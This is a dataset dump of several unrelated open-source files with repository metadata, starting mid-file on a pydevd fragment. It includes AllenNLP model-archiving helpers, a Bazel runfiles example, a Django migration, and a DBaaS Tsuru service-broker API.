# print('trace_dispatch', base, frame.f_lineno, event, frame.f_code.co_name, file_type)
if additional_info.is_tracing:
return None #we don't wan't to trace code invoked from pydevd_frame.trace_dispatch
# Just create PyDBFrame directly (removed support for Python versions < 2.5, which required keeping a weak
# reference to the frame).
ret = PyDBFrame((py_db, filename, additional_info, t, frame_skips_cache, (frame.f_code.co_name, frame.f_code.co_firstlineno, filename))).trace_dispatch(frame, event, arg)
if ret is None:
cache_skips[cache_key] = 1
return None
# IFDEF CYTHON
# return SafeCallWrapper(ret)
# ELSE
return ret
# ENDIF
except SystemExit:
return None
except Exception:
if py_db._finish_debugging_session:
return None # Don't log errors when we're shutting down.
# Log it
try:
if traceback is not None:
# This can actually happen during the interpreter shutdown in Python 2.7
traceback.print_exc()
except:
# Error logging? We're really in the interpreter shutdown...
# (https://github.com/fabioz/PyDev.Debugger/issues/8)
pass
return None
| 41.705 | 182 | 0.65208 |
ace76078d2b66cc99917d53b919dd8ad29ede387 | 7,462 | py | Python | allennlp/models/archival.py | jspreston/allennlp | 2d5f24bd94ba229741a1a17e09b540a374447c77 | [
"Apache-2.0"
] | null | null | null | allennlp/models/archival.py | jspreston/allennlp | 2d5f24bd94ba229741a1a17e09b540a374447c77 | [
"Apache-2.0"
] | null | null | null | allennlp/models/archival.py | jspreston/allennlp | 2d5f24bd94ba229741a1a17e09b540a374447c77 | [
"Apache-2.0"
] | null | null | null | """
Helper functions for archiving models and restoring archived models.
"""
from os import PathLike
from typing import NamedTuple, Union
import logging
import os
import tempfile
import tarfile
import shutil
from torch.nn import Module
from allennlp.common.checks import ConfigurationError
from allennlp.common.file_utils import cached_path
from allennlp.common.params import Params
from allennlp.models.model import Model, _DEFAULT_WEIGHTS
logger = logging.getLogger(__name__)
class Archive(NamedTuple):
""" An archive comprises a Model and its experimental config"""
model: Model
config: Params
def extract_module(self, path: str, freeze: bool = True) -> Module:
"""
This method can be used to load a module from the pretrained model archive.
It is also used implicitly in FromParams based construction. So instead of using standard
params to construct a module, you can instead load a pretrained module from the model
archive directly. For eg, instead of using params like {"type": "module_type", ...}, you
can use the following template::
{
"_pretrained": {
"archive_file": "../path/to/model.tar.gz",
"path": "path.to.module.in.model",
"freeze": False
}
}
If you use this feature with FromParams, take care of the following caveat: Call to
initializer(self) at end of model initializer can potentially wipe the transferred parameters
by reinitializing them. This can happen if you have setup initializer regex that also
matches parameters of the transferred module. To safe-guard against this, you can either
update your initializer regex to prevent conflicting match or add extra initializer::
[
[".*transferred_module_name.*", "prevent"]]
]
# Parameters
path : `str`, required
Path of target module to be loaded from the model.
Eg. "_textfield_embedder.token_embedder_tokens"
freeze : `bool`, optional (default=`True`)
Whether to freeze the module parameters or not.
"""
modules_dict = {path: module for path, module in self.model.named_modules()}
module = modules_dict.get(path)
if not module:
raise ConfigurationError(
f"You asked to transfer module at path {path} from "
f"the model {type(self.model)}. But it's not present."
)
if not isinstance(module, Module):
raise ConfigurationError(
f"The transferred object from model {type(self.model)} at path "
f"{path} is not a PyTorch Module."
)
for parameter in module.parameters(): # type: ignore
parameter.requires_grad_(not freeze)
return module
# We archive a model by creating a tar.gz file with its weights, config, and vocabulary.
#
# These constants are the *known names* under which we archive them.
CONFIG_NAME = "config.json"
_WEIGHTS_NAME = "weights.th"
def archive_model(
serialization_dir: Union[str, PathLike],
weights: str = _DEFAULT_WEIGHTS,
archive_path: Union[str, PathLike] = None,
) -> None:
"""
Archive the model weights, its training configuration, and its vocabulary to `model.tar.gz`.
# Parameters
serialization_dir : `str`
The directory where the weights and vocabulary are written out.
weights : `str`, optional (default=`_DEFAULT_WEIGHTS`)
Which weights file to include in the archive. The default is `best.th`.
archive_path : `str`, optional, (default = `None`)
A full path to serialize the model to. The default is "model.tar.gz" inside the
serialization_dir. If you pass a directory here, we'll serialize the model
to "model.tar.gz" inside the directory.
"""
weights_file = os.path.join(serialization_dir, weights)
if not os.path.exists(weights_file):
logger.error("weights file %s does not exist, unable to archive model", weights_file)
return
config_file = os.path.join(serialization_dir, CONFIG_NAME)
if not os.path.exists(config_file):
logger.error("config file %s does not exist, unable to archive model", config_file)
if archive_path is not None:
archive_file = archive_path
if os.path.isdir(archive_file):
archive_file = os.path.join(archive_file, "model.tar.gz")
else:
archive_file = os.path.join(serialization_dir, "model.tar.gz")
logger.info("archiving weights and vocabulary to %s", archive_file)
with tarfile.open(archive_file, "w:gz") as archive:
archive.add(config_file, arcname=CONFIG_NAME)
archive.add(weights_file, arcname=_WEIGHTS_NAME)
archive.add(os.path.join(serialization_dir, "vocabulary"), arcname="vocabulary")
def load_archive(
archive_file: str,
cuda_device: int = -1,
overrides: str = "",
weights_file: str = None,
) -> Archive:
"""
Instantiates an Archive from an archived `tar.gz` file.
# Parameters
archive_file : `str`
The archive file to load the model from.
cuda_device : `int`, optional (default = `-1`)
If `cuda_device` is >= 0, the model will be loaded onto the
corresponding GPU. Otherwise it will be loaded onto the CPU.
overrides : `str`, optional (default = `""`)
JSON overrides to apply to the unarchived `Params` object.
weights_file : `str`, optional (default = `None`)
The weights file to use. If unspecified, weights.th in the archive_file will be used.
"""
# redirect to the cache, if necessary
resolved_archive_file = cached_path(archive_file)
if resolved_archive_file == archive_file:
logger.info(f"loading archive file {archive_file}")
else:
logger.info(f"loading archive file {archive_file} from cache at {resolved_archive_file}")
tempdir = None
try:
if os.path.isdir(resolved_archive_file):
serialization_dir = resolved_archive_file
else:
# Extract archive to temp dir
tempdir = tempfile.mkdtemp()
logger.info(f"extracting archive file {resolved_archive_file} to temp dir {tempdir}")
with tarfile.open(resolved_archive_file, "r:gz") as archive:
archive.extractall(tempdir)
serialization_dir = tempdir
# Load config
config = Params.from_file(os.path.join(serialization_dir, CONFIG_NAME), overrides)
if weights_file:
weights_path = weights_file
else:
weights_path = os.path.join(serialization_dir, _WEIGHTS_NAME)
# Fallback for serialization directories.
if not os.path.exists(weights_path):
weights_path = os.path.join(serialization_dir, _DEFAULT_WEIGHTS)
# Instantiate model. Use a duplicate of the config, as it will get consumed.
model = Model.load(
config.duplicate(),
weights_file=weights_path,
serialization_dir=serialization_dir,
cuda_device=cuda_device,
)
finally:
if tempdir is not None:
logger.info(f"removing temporary unarchived model dir at {tempdir}")
shutil.rmtree(tempdir, ignore_errors=True)
return Archive(model=model, config=config)
| 37.878173 | 101 | 0.657733 |
ace76096f88d57753937f1fecb8a00be34544649 | 3,184 | bzl | Python | rules/runfiles/complex_tool.bzl | aiuto/bazel_examples | b3df8fc2601ac78e8208c63b9f5d74c599857b2f | [
"Apache-2.0"
] | null | null | null | rules/runfiles/complex_tool.bzl | aiuto/bazel_examples | b3df8fc2601ac78e8208c63b9f5d74c599857b2f | [
"Apache-2.0"
] | null | null | null | rules/runfiles/complex_tool.bzl | aiuto/bazel_examples | b3df8fc2601ac78e8208c63b9f5d74c599857b2f | [
"Apache-2.0"
] | null | null | null | """Create a complex tool with runfiles and a rule which uses it.
A tool (executable used for action registration) may depend on another
tool with its own runfiles. This example demonstrates this scenario."""
def _sub_tool_impl(ctx):
# Since this tool may be used by another tool, it must support accepting
# a different runfiles directory root. The runfiles directory is always
# adjacent to the *root* tool being run, which may not be this tool.
# (In this case, this is done by environment variable RUNFILES_DIR.)
command = """
if [[ -z "${RUNFILES_DIR}" ]]; then
RUNFILES_DIR=${0}.runfiles
fi
cat ${RUNFILES_DIR}/examples/runfiles/data.txt > $1"""
# Using root_symlinks or symlinks for a tool is very brittle if the
# tool may be used by another tool; there will be a collision when merging
# runfiles if the other tool defines a symlink of the same name as one
# defined by this rule.
ctx.actions.write(
output = ctx.outputs.executable,
content = command,
is_executable = True,
)
# Subtool depends on RUNFILES_DIR/<workspace_name>/runfiles/data.txt.
return [DefaultInfo(
runfiles = ctx.runfiles(files = [ctx.files._data[0]]),
)]
sub_tool = rule(
implementation = _sub_tool_impl,
executable = True,
attrs = {
"command": attr.string(),
"_data": attr.label(
allow_files = True,
default = ":data.txt",
),
},
)
def _complex_tool_impl(ctx):
my_runfiles = ctx.runfiles(files = [ctx.files._data[0]])
# Use runfiles.merge to merge the runfiles of both tools. All runfiles will
# be rooted under the runfiles directory owned by this rule, however.
my_runfiles = my_runfiles.merge(ctx.attr._subtool[DefaultInfo].default_runfiles)
# Thus the example directory structure is:
# runfiles/complex_tool (executable)
# runfiles/complex_tool.runfiles/
# <workspace_name>/
# runfiles/
# complex_tool_data.txt
# data.txt
# subtool
runfiles_relative_tool_path = ctx.workspace_name + "/" + ctx.attr._subtool[DefaultInfo].files_to_run.executable.short_path
# This tool forwards its runfiles directory via the RUNFILES_DIR to the
# subtool, otherwise the subtool would be looking to $0.runfiles, which does
# not exist.
command = ("#!/bin/bash\nexport RUNFILES_DIR=\"$0.runfiles\" && " +
"${RUNFILES_DIR}/%s $1 && cat ${RUNFILES_DIR}/examples/%s >> $1") % (
runfiles_relative_tool_path,
ctx.files._data[0].short_path,
)
ctx.actions.write(
output = ctx.outputs.executable,
content = command,
is_executable = True,
)
return [DefaultInfo(
runfiles = my_runfiles,
)]
complex_tool = rule(
implementation = _complex_tool_impl,
executable = True,
attrs = {
"command": attr.string(),
"_subtool": attr.label(
allow_files = True,
default = ":subtool",
),
"_data": attr.label(
allow_files = True,
default = ":complex_tool_data.txt",
),
},
)
| 32.824742 | 126 | 0.637563 |
ace7616a6c6c9559123cf1371c71a3fdb2617dce | 1,131 | py | Python | koku/reporting/migrations/0158_auto_20201214_1757.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 2 | 2022-01-12T03:42:39.000Z | 2022-01-12T03:42:40.000Z | koku/reporting/migrations/0158_auto_20201214_1757.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0158_auto_20201214_1757.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 1 | 2021-07-21T09:33:59.000Z | 2021-07-21T09:33:59.000Z | # Generated by Django 3.1.3 on 2020-12-14 17:57
import uuid
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [("reporting", "0157_auto_20201214_1757")]
operations = [
migrations.AlterField(
model_name="ocpawscostlineitemdailysummary",
name="uuid",
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name="ocpawscostlineitemprojectdailysummary",
name="uuid",
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name="ocpazurecostlineitemdailysummary",
name="uuid",
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name="ocpazurecostlineitemprojectdailysummary",
name="uuid",
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
]
| 33.264706 | 90 | 0.648099 |
ace761e9e0971b90268843f6ac15306333f05e8c | 28,004 | py | Python | dbaas/tsuru/views.py | TiagoDanin-Forks/database-as-a-service | bc43e5638cda459488e6d77d87c16f5d65222e57 | [
"BSD-3-Clause"
] | 1 | 2021-08-03T09:50:20.000Z | 2021-08-03T09:50:20.000Z | dbaas/tsuru/views.py | nouraellm/database-as-a-service | 5e655c9347bea991b7218a01549f5e44f161d7be | [
"BSD-3-Clause"
] | null | null | null | dbaas/tsuru/views.py | nouraellm/database-as-a-service | 5e655c9347bea991b7218a01549f5e44f161d7be | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import logging
import requests
from slugify import slugify
from django.core.exceptions import MultipleObjectsReturned
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.renderers import JSONRenderer, JSONPRenderer
from rest_framework.response import Response
from networkapiclient import Ip, Network
from django.utils.functional import cached_property
from util import get_credentials_for
from util.decorators import REDIS_CLIENT
from util import simple_health_check
from physical.models import Plan, Environment, PlanNotFound, Pool
from account.models import AccountUser, Team
from notification.models import TaskHistory
from notification.tasks import TaskRegister
from workflow.steps.util.base import ACLFromHellClient
from maintenance.models import DatabaseCreate
from dbaas_credentials.models import CredentialType
from logical.validators import database_name_evironment_constraint
from logical.models import Database
from logical.forms import DatabaseForm
from dbaas.middleware import UserMiddleware
LOG = logging.getLogger(__name__)
DATABASE_NAME_REGEX = re.compile('^[a-z][a-z0-9_]+$')
class ListPlans(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
model = Plan
def get(self, request, format=None):
hard_plans = Plan.objects.filter(
environments__name=get_url_env(request)
).values(
'name', 'description', 'environments__name'
).extra(
where=['is_active=True', 'provider={}'.format(Plan.CLOUDSTACK)]
)
return Response(get_plans_dict(hard_plans))
class GetServiceStatus(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
model = Database
def get(self, request, database_name, format=None):
env = get_url_env(request)
LOG.info("Database name {}. Environment {}".format(
database_name, env)
)
try:
database = get_database(database_name, env)
database_status = database.status
except IndexError as e:
database_status = 0
LOG.warn(
"There is not a database with this {} name on {}. {}".format(
database_name, env, e
)
)
LOG.info("Status = {}".format(database_status))
task = TaskHistory.objects.filter(
Q(arguments__contains=database_name) &
Q(arguments__contains=env), task_status="RUNNING"
).order_by("created_at")
LOG.info("Task {}".format(task))
if database_status == Database.ALIVE:
database_status = status.HTTP_204_NO_CONTENT
elif database_status == Database.DEAD and not task:
database_status = status.HTTP_500_INTERNAL_SERVER_ERROR
else:
database_status = status.HTTP_202_ACCEPTED
return Response(status=database_status)
class GetServiceInfo(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
model = Database
def get(self, request, database_name, format=None):
env = get_url_env(request)
try:
database = get_database(database_name, env)
info = {'used_size_in_bytes': str(database.used_size_in_bytes)}
except IndexError as e:
info = {}
LOG.warn(
"There is not a database {} on {}. {}".format(
database_name, env, e
)
)
LOG.info("Info = {}".format(info))
return Response(info)
class ServiceAppBind(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
model = Database
def add_acl_for_hosts(self, database, app_name):
infra = database.infra
hosts = infra.hosts
acl_from_hell_client = ACLFromHellClient(database.environment)
for host in hosts:
resp = acl_from_hell_client.add_acl(
database,
app_name,
host.hostname
)
if not resp.ok:
msg = "Error for {} on {}.".format(
database.name, database.environment.name
)
return log_and_response(
msg=msg, e=resp.content,
http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
acl_from_hell_client.add_acl_for_vip_if_needed(database, app_name)
return None
@staticmethod
def _handle_app_name(app_name):
return app_name[0] if isinstance(app_name, list) else app_name
def post(self, request, database_name, format=None):
"""This method binds a App to a database through tsuru."""
env = get_url_env(request)
data = request.DATA
LOG.debug("Tsuru Bind App POST Request DATA {}".format(data))
response = check_database_status(database_name, env)
if not isinstance(response, self.model):
return response
database = response
self.add_acl_for_hosts(
database,
self._handle_app_name(data['app-name'])
)
hosts, ports = database.infra.get_driver().get_dns_port()
ports = str(ports)
if database.databaseinfra.engine.name == 'redis':
redis_password = database.databaseinfra.password
endpoint = database.get_endpoint_dns().replace(
'<password>', redis_password
)
env_vars = {
"DBAAS_REDIS_PASSWORD": redis_password,
"DBAAS_REDIS_ENDPOINT": endpoint,
"DBAAS_REDIS_HOST": hosts,
"DBAAS_REDIS_PORT": ports
}
if 'redis_sentinel' in database.infra.get_driver().topology_name():
env_vars = {
"DBAAS_SENTINEL_PASSWORD": redis_password,
"DBAAS_SENTINEL_ENDPOINT": endpoint,
"DBAAS_SENTINEL_ENDPOINT_SIMPLE": database.get_endpoint_dns_simple(), # noqa
"DBAAS_SENTINEL_SERVICE_NAME": database.databaseinfra.name,
"DBAAS_SENTINEL_HOSTS": hosts,
"DBAAS_SENTINEL_PORT": ports
}
else:
try:
credential = (
database.credentials.filter(privileges='Owner')
or database.credentials.all()
)[0]
except IndexError as e:
msg = ("Database {} in env {} does not have "
"credentials.").format(
database_name, env
)
return log_and_response(
msg=msg, e=e,
http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
endpoint = database.get_endpoint_dns().replace(
'<user>:<password>', "{}:{}".format(
credential.user, credential.password
)
)
kind = ''
if endpoint.startswith('mysql'):
kind = 'MYSQL_'
if endpoint.startswith('mongodb'):
kind = 'MONGODB_'
env_vars = {
"DBAAS_{}USER".format(kind): credential.user,
"DBAAS_{}PASSWORD".format(kind): credential.password,
"DBAAS_{}ENDPOINT".format(kind): endpoint,
"DBAAS_{}HOSTS".format(kind): hosts,
"DBAAS_{}PORT".format(kind): ports
}
return Response(env_vars, status.HTTP_201_CREATED)
def delete(self, request, database_name, format=None):
"""This method unbinds a App to a database through tsuru."""
env = get_url_env(request)
data = request.DATA
LOG.debug("Tsuru Unbind App DELETE Request DATA {}".format(data))
response = check_database_status(database_name, env)
if not isinstance(response, Database):
return response
database = response
acl_from_hell_client = ACLFromHellClient(database.environment)
acl_from_hell_client.remove_acl(
database,
self._handle_app_name(data['app-name'])
)
return Response(status=status.HTTP_204_NO_CONTENT)
class ServiceUnitBind(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
model = Database
def post(self, request, database_name, format=None):
return Response(None, status.HTTP_201_CREATED)
def delete(self, request, database_name, format=None):
return Response(status.HTTP_204_NO_CONTENT)
class ServiceAdd(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
required_params = ('description', 'plan', 'user', 'name', 'team')
search_metadata_params = ('plan', 'user', 'team')
model = Database
tsuru_pool_name_header = 'HTTP_X_TSURU_POOL_NAME'
tsuru_pool_endpoint_header = 'HTTP_X_TSURU_CLUSTER_ADDRESSES'
def __init__(self, *args, **kw):
super(ServiceAdd, self).__init__(*args, **kw)
self.extra_params = {}
@cached_property
def data(self):
return self.request.DATA
@property
def description_param(self):
return self.data.get('description')
@property
def name_param(self):
return self.data.get('name')
@property
def user_param(self):
return self.data.get('user')
@property
def dbaas_user(self):
return AccountUser.objects.get(email=self.user_param)
@property
def team_param(self):
return self.data.get('team')
@property
def dbaas_team(self):
return Team.objects.get(name=self.team_param)
@property
def env_param(self):
return get_url_env(self.request)
@property
def env(self):
return Environment.objects.get(name=self.env_param)
@property
def is_k8s_env(self):
k8s_envs = Environment.k8s_envs()
return self.env_param in k8s_envs
@property
def plan_param(self):
return self.data.get('plan')
@cached_property
def dbaas_plan(self):
hard_plans = Plan.objects.values(
'name', 'description', 'pk', 'environments__name'
).extra(
where=['is_active=True', 'provider={}'.format(Plan.CLOUDSTACK)]
)
plans = get_plans_dict(hard_plans)
plan = [splan for splan in plans if splan['name'] == self.plan_param]
if any(plan):
return Plan.objects.get(pk=plan[0]['pk'])
else:
raise PlanNotFound("Plan was not found")
@property
def pool_param(self):
return self.request.META.get(self.tsuru_pool_name_header)
@property
def pool_endpoint_param(self):
return self.request.META.get(self.tsuru_pool_endpoint_header)
@property
def dbaas_pool(self):
return Pool.objects.get(
cluster_endpoint=self.pool_endpoint_param
)
def _validate_required_params(self):
for param_name in self.required_params:
param_value = self.data.get(param_name)
if not param_value:
msg = "Param {} must be provided.".format(param_name)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_search_metadata_params(self):
"""
Search the field param on database.
Ex. param user
Search the username on database if does not found we return
the error
"""
for param_name in self.search_metadata_params:
if param_name in self.data:
try:
getattr(self, 'dbaas_{}'.format(param_name))
except (ObjectDoesNotExist, PlanNotFound):
return log_and_response(
msg='{} <{}> was not found'.format(
param_name.capitalize(),
getattr(self, '{}_param'.format(param_name))
),
http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_database(self):
msg = ''
if DATABASE_NAME_REGEX.match(self.name_param) is None:
msg = "Your database name must match /^[a-z][a-z0-9_]+$/ ."
try:
Database.objects.get(
name=self.name_param, environment__name=self.env_param
)
msg = "There is already a database called {} in {}.".format(
self.name_param, self.env
)
except Database.DoesNotExist:
pass
if database_name_evironment_constraint(self.name_param, self.env):
msg = "{} already exists in env {}!".format(
self.name_param, self.env_param
)
if msg:
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_user(self):
try:
AccountUser.objects.get(email=self.user_param)
except MultipleObjectsReturned as e:
msg = "There are multiple user for {} email.".format(
self.user_param
)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_team(self):
try:
self.dbaas_user.team_set.get(name=self.team_param)
except ObjectDoesNotExist as e:
msg = "The user is not on {} team.".format(self.team_param)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_env(self):
try:
self.env
except ObjectDoesNotExist:
msg = "Environment was not found"
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_database_alocation(self):
databases_used_by_team = self.dbaas_team.count_databases_in_use(
environment=self.env
)
database_alocation_limit = self.dbaas_team.database_alocation_limit
if databases_used_by_team >= database_alocation_limit:
msg = ("The database alocation limit of {} has been exceeded for "
"the selected team: {}").format(
database_alocation_limit, self.dbaas_team
)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
def _validate_plan(self):
if self.env not in self.dbaas_plan.environments.all():
msg = 'Plan "{}" is not available to "{}" environment'.format(
self.dbaas_plan, self.env
)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
), self.dbaas_plan
def _validate_if_kubernetes_env(self):
LOG.info("Tsuru Debug headers:{}".format(self.request.META))
if self.is_k8s_env:
if not self.pool_param:
msg = ("the header <{}> was not found "
"on headers. Contact tsuru team.".format(
self.tsuru_pool_name_header
))
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
if not self.pool_endpoint_param:
msg = (
"the header <{}> "
"was not found on headers. Contact tsuru team.".format(
self.tsuru_pool_endpoint_header
)
)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
if not self.pool_endpoint_param:
msg = (
"the header <HTTP_X_TSURU_CLUSTER_ADDRESS> "
"was not found on headers. Contact tsuru team."
)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
try:
self.dbaas_pool
except Pool.DoesNotExist:
msg = (
"Pool with name <{}> and endpoint <{}> was not found"
).format(
self.pool_param,
self.pool_endpoint_param
)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
if not self.dbaas_pool.teams.filter(name=self.team_param).exists():
msg = "The Team <{}> arent on Pool <{}>".format(
self.team_param, self.pool_param
)
return log_and_response(
msg=msg, http_status=status.HTTP_400_BAD_REQUEST
)
self.extra_params.update({'pool': self.dbaas_pool})
def post(self, request, format=None):
err = self._validate_required_params()
if err is not None:
return err
err = self._validate_search_metadata_params()
if err is not None:
return err
err = self._validate_env()
if err is not None:
return err
err = self._validate_database()
if err is not None:
return err
err = self._validate_user()
if err is not None:
return err
err = self._validate_team()
if err is not None:
return err
err = self._validate_database_alocation()
if err is not None:
return err
err = self._validate_plan()
if err is not None:
return err
err = self._validate_if_kubernetes_env()
if err is not None:
return err
backup_hour, maintenance_hour, maintenance_day = (
DatabaseForm.randomize_backup_and_maintenance_hour()
)
TaskRegister.database_create(
name=self.name_param,
plan=self.dbaas_plan,
environment=self.env,
team=self.dbaas_team,
project=None,
description=self.description_param,
user=self.dbaas_user,
is_protected=True,
backup_hour=backup_hour,
maintenance_window=maintenance_hour,
maintenance_day=maintenance_day,
**self.extra_params
)
return Response(status=status.HTTP_201_CREATED)
class ServiceRemove(APIView):
renderer_classes = (JSONRenderer, JSONPRenderer)
model = Database
def put(self, request, database_name, format=None):
data = request.DATA
user = data['user']
team = data['team']
data['plan']
env = get_url_env(request)
UserMiddleware.set_current_user(request.user)
env = get_url_env(request)
try:
database = get_database(database_name, env)
except IndexError as e:
msg = "Database id provided does not exist {} in {}.".format(
database_name, env)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_404_NOT_FOUND
)
try:
dbaas_user = AccountUser.objects.get(email=user)
except ObjectDoesNotExist as e:
msg = "User does not exist."
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
except MultipleObjectsReturned as e:
msg = "There are multiple user for {} email.".format(user)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
try:
dbaas_team = Team.objects.get(name=team)
except ObjectDoesNotExist as e:
msg = "Team does not exist."
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
try:
dbaas_user.team_set.get(name=dbaas_team.name)
except ObjectDoesNotExist as e:
msg = "The user is not on {} team.".format(dbaas_team.name)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
database.team = dbaas_team
database.save()
return Response(status=status.HTTP_204_NO_CONTENT)
def delete(self, request, database_name, format=None):
UserMiddleware.set_current_user(request.user)
env = get_url_env(request)
try:
database = get_database(database_name, env)
except IndexError as e:
msg = "Database id provided does not exist {} in {}.".format(
database_name, env)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
database.delete()
return Response(status.HTTP_204_NO_CONTENT)
def get_plans_dict(hard_plans):
plans = []
for hard_plan in hard_plans:
hard_plan['description'] = hard_plan[
'name'] + '-' + hard_plan['environments__name']
hard_plan['name'] = slugify(hard_plan['description'])
del hard_plan['environments__name']
plans.append(hard_plan)
return plans
def get_url_env(request):
return request._request.path.split('/')[1]
def log_and_response(msg, http_status, e="Conditional Error."):
LOG.warn(msg)
LOG.warn("Error: {}".format(e))
return Response("[DBaaS Error] {}".format(msg), http_status)
def last_database_create(database_name, env):
"""This function returns the most recent DatabaseCreate's task.
Parameters:
database_name (str): Name of the database
env (str): It represents the database environment (prod or dev)
Returns:
DatabaseCreate: DatabaseCreate object
"""
return DatabaseCreate.objects.filter(
name=database_name,
environment__name=env
).last()
def check_database_status(database_name, env):
"""This function looks for a DatabaseCreate task and returns a http
response or the Database itself depeding on the context. If the
DatabaseCreate task is still running of failed, a http response is
returned, otherwise this functions tries to retrieve the Database with
the get_database function.
Parameters:
database_name (str): Name of the database
env (str): It represents the database environment (prod or dev)
Returns:
Database or Response: Database or Rest Framework Response object
"""
database_create = last_database_create(database_name, env)
LOG.info(
"Task {}".format(getattr(database_create, 'task', 'No tasks found'))
)
if database_create:
if database_create.is_running:
msg = "Database {} in env {} is beeing created.".format(
database_name, env)
return log_and_response(
msg=msg, http_status=status.HTTP_412_PRECONDITION_FAILED)
elif database_create.is_status_error:
msg = ("A error ocurred creating database {} in env {}. Check "
"error on task history in https://dbaas.globoi.com").format(
database_name, env)
return log_and_response(
msg=msg, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
try:
database = get_database(database_name, env)
except IndexError as e:
msg = "Database {} does not exist in env {}.".format(
database_name, env)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except MultipleObjectsReturned as e:
msg = "There are multiple databases called {} in {}.".format(
database_name, env)
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
msg = "Something ocurred on dbaas, please get in touch with your DBA."
return log_and_response(
msg=msg, e=e, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
if not(database and database.status):
msg = "Database {} is not Alive.".format(database_name)
return log_and_response(
msg=msg, http_status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return database
def get_network_from_ip(ip, database_environment):
net_api_credentials = get_credentials_for(
environment=database_environment,
credential_type=CredentialType.NETWORKAPI
)
ip_client = Ip.Ip(
net_api_credentials.endpoint, net_api_credentials.user,
net_api_credentials.password
)
ips = ip_client.get_ipv4_or_ipv6(ip)
ips = ips['ips']
if type(ips) != list:
ips = [ips]
net_ip = ips[0]
network_client = Network.Network(
net_api_credentials.endpoint, net_api_credentials.user,
net_api_credentials.password
)
network = network_client.get_network_ipv4(net_ip['networkipv4'])
network = network['network']
return '{}.{}.{}.{}/{}'.format(
network['oct1'], network['oct2'], network['oct3'],
network['oct4'], network['block']
)
def get_database(name, env):
query_params = {
'name': name
}
if env in Environment.dev_envs():
query_params['environment__name'] = env
else:
query_params['environment__name__in'] = Environment.prod_envs()
return Database.objects.filter(
**query_params
).exclude(is_in_quarantine=True)[0]
def check_acl_service_and_get_unit_network(database, data,
ignore_ip_error=False):
try:
acl_credential = get_credentials_for(
environment=database.environment,
credential_type=CredentialType.ACLAPI
)
except IndexError:
error = 'The {} do not have integration with ACLAPI'.format(
database.environment
)
return log_and_response(
msg=None, e=error, http_status=status.HTTP_201_CREATED
)
health_check_info = acl_credential.get_parameters_by_group('hc')
try:
health_check_url = (acl_credential.endpoint
+ health_check_info['health_check_url'])
simple_hc = simple_health_check.SimpleHealthCheck(
health_check_url=health_check_url,
service_key=health_check_info['key_name'],
redis_client=REDIS_CLIENT, http_client=requests,
http_request_exceptions=(Exception,), verify_ssl=False,
health_check_request_timeout=int(health_check_info['timeout'])
)
except KeyError as e:
msg = "AclApi Credential configured improperly."
return log_and_response(
msg=msg, e=e,
http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
try:
simple_hc.check_service()
except simple_health_check.HealthCheckError as e:
LOG.warn(e)
msg = ("We are experiencing errors with the acl api, please try again "
"later.")
return log_and_response(
msg=msg, e=e,
http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
except Exception as e:
LOG.warn(e)
try:
return get_network_from_ip(
data.get('unit-host'), database.environment
)
except Exception as e:
LOG.warn(e)
msg = ("We are experiencing errors with the network api, please try "
"get network again later")
if not ignore_ip_error:
return log_and_response(
msg=msg, e=e,
http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
)
| 34.15122 | 97 | 0.6017 |
